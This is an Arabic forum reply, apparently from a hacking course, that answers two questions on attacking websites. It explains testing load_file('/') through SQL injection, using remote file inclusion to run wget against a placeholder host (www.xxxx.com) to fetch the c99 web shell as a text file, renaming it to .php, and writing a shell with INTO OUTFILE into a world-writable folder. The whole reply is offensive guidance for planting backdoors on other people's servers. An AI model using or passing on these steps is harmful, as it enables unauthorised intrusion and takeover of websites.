وعليكم السلام ورحمة الله وبركاته

السؤال الاول وهو امر load_file('/')وتقوم بوضعه في الجدول المصاب فاذا ظهر لك خطأ فلا تستطيع ذلك اما اذا لم يظهر فيمكنك المتابعة بالحق واضافة ملف ثم رفع شل في الحقن
وانت عندما اظهرت يوزرات المواقع هذا ليس sql وانما remote file include
وبهذه تستطيع ايضا ان ترفع شل بالامر
wget www.xxxx.com/c99.txt
الاكسات تضع بدلها شل txt
ثم تقوم بالامر
mv c99.txt c99.php
وبهذا رفعت شل لكن ليس في كل المواقع تقبل رفع ش
(اذهب الى الدرس 8 في دورة استغلال الثغرات)

السؤال الثاني
انه ليس كل السكربتات المصابة وتدخل لوحة التحكم تسمح برفع شل فيها لاكن ليس كلهاا
واما عن into_file فهو تكملة للامرload_file('/') وتضعه في نهاية الاستغلال وتضع الملف اللي ترفع عليه ويحب ان يكون عندك ملف عليه تصريح 777 وتستطيع معرفة ذلك عن طريق رؤية مجلد الصور والماجيك كوتس تظهره من اللود فايل كما قلت اذا ظهر خطأ فهذا مفعل اذا لم يظهر هذا اوف وبهذا تكون رفعت شلفدتك
واتمنى اني افدتك